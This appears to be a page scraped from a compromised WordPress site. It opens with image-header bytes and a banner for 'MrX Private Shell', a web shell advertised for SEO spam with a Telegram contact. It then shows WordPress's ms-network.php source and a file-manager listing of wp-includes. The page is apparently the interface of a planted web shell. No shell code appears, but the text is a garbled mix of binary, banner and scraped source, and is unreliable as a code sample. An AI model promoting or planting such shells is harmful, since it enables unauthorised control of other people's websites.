����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Network API
*
* @package WordPress
* @subpackage Multisite
* @since 5.1.0
*/
/**
* Retrieves network data given a network ID or network object.
*
* Network data will be cached and returned after being passed through a filter.
* If the provided network is empty, the current network global will be used.
*
* @since 4.6.0
*
* @global WP_Network $current_site
*
* @param WP_Network|int|null $network Optional. Network to retrieve. Default is the current network.
* @return WP_Network|null The network object or null if not found.
*/
function get_network( $network = null ) {
global $current_site;
if ( empty( $network ) && isset( $current_site ) ) {
$network = $current_site;
}
if ( $network instanceof WP_Network ) {
$_network = $network;
} elseif ( is_object( $network ) ) {
$_network = new WP_Network( $network );
} else {
$_network = WP_Network::get_instance( $network );
}
if ( ! $_network ) {
return null;
}
/**
* Fires after a network is retrieved.
*
* @since 4.6.0
*
* @param WP_Network $_network Network data.
*/
$_network = apply_filters( 'get_network', $_network );
return $_network;
}
/**
* Retrieves a list of networks.
*
* @since 4.6.0
*
* @param string|array $args Optional. Array or string of arguments. See WP_Network_Query::parse_query()
* for information on accepted arguments. Default empty array.
* @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids',
* or the number of networks when 'count' is passed as a query var.
*/
function get_networks( $args = array() ) {
$query = new WP_Network_Query();
return $query->query( $args );
}
/**
* Removes a network from the object cache.
*
* @since 4.6.0
*
* @global bool $_wp_suspend_cache_invalidation
*
* @param int|array $ids Network ID or an array of network IDs to remove from cache.
*/
function clean_network_cache( $ids ) {
global $_wp_suspend_cache_invalidation;
if ( ! empty( $_wp_suspend_cache_invalidation ) ) {
return;
}
$network_ids = (array) $ids;
wp_cache_delete_multiple( $network_ids, 'networks' );
foreach ( $network_ids as $id ) {
/**
* Fires immediately after a network has been removed from the object cache.
*
* @since 4.6.0
*
* @param int $id Network ID.
*/
do_action( 'clean_network_cache', $id );
}
wp_cache_set_last_changed( 'networks' );
}
/**
* Updates the network cache of given networks.
*
* Will add the networks in $networks to the cache. If network ID already exists
* in the network cache then it will not be updated. The network is added to the
* cache using the network group with the key using the ID of the networks.
*
* @since 4.6.0
*
* @param array $networks Array of network row objects.
*/
function update_network_cache( $networks ) {
$data = array();
foreach ( (array) $networks as $network ) {
$data[ $network->id ] = $network;
}
wp_cache_add_multiple( $data, 'networks' );
}
/**
* Adds any networks from the given IDs to the cache that do not already exist in cache.
*
* @since 4.6.0
* @since 6.1.0 This function is no longer marked as "private".
*
* @see update_network_cache()
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $network_ids Array of network IDs.
*/
function _prime_network_caches( $network_ids ) {
global $wpdb;
$non_cached_ids = _get_non_cached_ids( $network_ids, 'networks' );
if ( ! empty( $non_cached_ids ) ) {
$fresh_networks = $wpdb->get_results( sprintf( "SELECT $wpdb->site.* FROM $wpdb->site WHERE id IN (%s)", implode( ',', array_map( 'intval', $non_cached_ids ) ) ) ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
update_network_cache( $fresh_networks );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ID3 | Folder | 0755 |
|
|
| IXR | Folder | 0755 |
|
|
| PHPMailer | Folder | 0755 |
|
|
| Requests | Folder | 0755 |
|
|
| SimplePie | Folder | 0755 |
|
|
| Text | Folder | 0755 |
|
|
| abilities-api | Folder | 0755 |
|
|
| assets | Folder | 0755 |
|
|
| block-bindings | Folder | 0755 |
|
|
| block-patterns | Folder | 0755 |
|
|
| block-supports | Folder | 0755 |
|
|
| blocks | Folder | 0755 |
|
|
| certificates | Folder | 0755 |
|
|
| css | Folder | 0755 |
|
|
| customize | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| html-api | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| interactivity-api | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| l10n | Folder | 0755 |
|
|
| php-compat | Folder | 0755 |
|
|
| pomo | Folder | 0755 |
|
|
| rest-api | Folder | 0755 |
|
|
| sitemaps | Folder | 0755 |
|
|
| sodium_compat | Folder | 0755 |
|
|
| style-engine | Folder | 0755 |
|
|
| theme-compat | Folder | 0755 |
|
|
| widgets | Folder | 0755 |
|
|
| atomlib.php | File | 11.9 KB | 0644 |
|
| cache.php | File | 13.17 KB | 0644 |
|
| class-feed.php | File | 539 B | 0644 |
|
| class-http.php | File | 367 B | 0644 |
|
| class-json.php | File | 42.65 KB | 0644 |
|
| class-pop3.php | File | 20.63 KB | 0644 |
|
| class-smtp.php | File | 457 B | 0644 |
|
| class-wp-hook.php | File | 16.28 KB | 0644 |
|
| class-wp-http-response.php | File | 2.91 KB | 0644 |
|
| class-wp-http.php | File | 40.6 KB | 0644 |
|
| class-wp-post.php | File | 6.34 KB | 0644 |
|
| class-wp-role.php | File | 2.46 KB | 0644 |
|
| class-wp-site.php | File | 7.29 KB | 0644 |
|
| class-wp-term.php | File | 5.17 KB | 0644 |
|
| class-wp-user.php | File | 22.5 KB | 0644 |
|
| class-wpdb.php | File | 115.85 KB | 0644 |
|
| compat.php | File | 17.41 KB | 0644 |
|
| cron.php | File | 41.98 KB | 0644 |
|
| deprecated.php | File | 188.13 KB | 0644 |
|
| feed.php | File | 24.6 KB | 0644 |
|
| formatting.php | File | 346.43 KB | 0644 |
|
| kses.php | File | 81.73 KB | 0644 |
|
| l10n.php | File | 67.18 KB | 0644 |
|
| link-template.php | File | 156.36 KB | 0644 |
|
| locale.php | File | 162 B | 0644 |
|
| massby2.php | File | 3.76 KB | 0644 |
|
| media.php | File | 216.06 KB | 0644 |
|
| ms-deprecated.php | File | 21.25 KB | 0644 |
|
| ms-load.php | File | 19.42 KB | 0644 |
|
| ms-network.php | File | 3.69 KB | 0644 |
|
| ms-site.php | File | 40.74 KB | 0644 |
|
| option.php | File | 102.57 KB | 0644 |
|
| plugin.php | File | 35.65 KB | 0644 |
|
| post-template.php | File | 67.04 KB | 0644 |
|
| post.php | File | 289.13 KB | 0644 |
|
| query.php | File | 36.23 KB | 0644 |
|
| rewrite.php | File | 19.03 KB | 0644 |
|
| rss-functions.php | File | 255 B | 0644 |
|
| rss.php | File | 22.66 KB | 0644 |
|
| session.php | File | 258 B | 0644 |
|
| shortcodes.php | File | 23.49 KB | 0644 |
|
| theme.php | File | 131.84 KB | 0644 |
|
| update.php | File | 37.45 KB | 0644 |
|
| user.php | File | 173.92 KB | 0644 |
|
| utf8.php | File | 7.09 KB | 0644 |
|
| vars.php | File | 6.41 KB | 0644 |
|
| version.php | File | 1.08 KB | 0644 |
|
| widgets.php | File | 69.46 KB | 0644 |
|
| wp-diff.php | File | 799 B | 0644 |
|